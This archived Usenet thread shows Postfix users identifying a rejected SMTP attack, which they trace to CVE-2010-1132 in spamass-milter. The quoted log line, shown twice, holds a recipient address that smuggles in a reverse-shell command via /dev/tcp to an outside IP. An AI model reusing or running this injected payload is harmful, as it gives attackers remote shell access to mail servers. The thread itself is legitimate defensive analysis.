Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

What attack is this one?

5 views
Skip to first unread message

Bob Proulx

unread,
Feb 12, 2011, 4:53:53 PM2/12/11
to
A friend's Mac running Postfix logged this rejected attack:

Feb 11 21:45:28 mailer postfix/smtpd[3708]: NOQUEUE: reject: RCPT from unknown[216.104.47.74]: 504 5.5.2 <bluedick>: Helo command rejected: need fully-qualified hostname; from=<bl...@dick.com> to=<root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0> proto=SMTP helo=<bluedick>

Of course this particular message was blocked at the HELO stage. But
I was curious as to what attack vector this was trying to exploit and
against what mail transport agent? I searched the web quite a bit and
didn't see this particular attack discussed anywhere.

Obviously the /dev/tcp/host/port part is trying to connect back to a
C&C host and attach the network connection to a root shell. I
understand the shell scripting part of the attack fine.

The remote mta security exploit I couldn't locate references to was
the "to=<root+:|exec /bin/sh ..." part of the attack. What mta is
vulnerable to "+:|" in the To address? Or perhaps none are and this
is simply a failed probe attempt?

Thanks,
Bob

Sahil Tandon

unread,
Feb 12, 2011, 5:03:33 PM2/12/11
to

Likely related to CVE-2010-1132:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1132
http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html

--
Sahil Tandon <sa...@FreeBSD.org>

Bob Proulx

unread,
Feb 12, 2011, 5:41:18 PM2/12/11
to
Sahil Tandon wrote:

> Bob Proulx wrote:
> > The remote mta security exploit I couldn't locate references to was
> > the "to=<root+:|exec /bin/sh ..." part of the attack. What mta is
> > vulnerable to "+:|" in the To address? Or perhaps none are and this
> > is simply a failed probe attempt?
>
> Likely related to CVE-2010-1132:
>
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1132
> http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html

Ah... Yes that does look like it.

Thanks!
Bob

Robert Schetterer

unread,
Feb 13, 2011, 3:45:52 AM2/13/11
to
Am 12.02.2011 22:53, schrieb Bob Proulx:
> A friend's Mac running Postfix logged this rejected attack:
>
> Feb 11 21:45:28 mailer postfix/smtpd[3708]: NOQUEUE: reject: RCPT from unknown[216.104.47.74]: 504 5.5.2 <bluedick>: Helo command rejected: need fully-qualified hostname; from=<bl...@dick.com> to=<root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0> proto=SMTP helo=<bluedick>
>
> Of course this particular message was blocked at the HELO stage. But
> I was curious as to what attack vector this was trying to exploit and
> against what mail transport agent? I searched the web quite a bit and
> didn't see this particular attack discussed anywhere.
>
> Obviously the /dev/tcp/host/port part is trying to connect back to a
> C&C host and attach the network connection to a root shell. I
> understand the shell scripting part of the attack fine.
>
> The remote mta security exploit I couldn't locate references to was
> the "to=<root+:|exec /bin/sh ..." part of the attack. What mta is
> vulnerable to "+:|" in the To address? Or perhaps none are and this
> is simply a failed probe attempt?
>
> Thanks,
> Bob

looks like trying allready fixed bug on spamass-milter

http://savannah.nongnu.org/bugs/?29136

--
Best Regards

MfG Robert Schetterer

Germany/Munich/Bavaria

0 new messages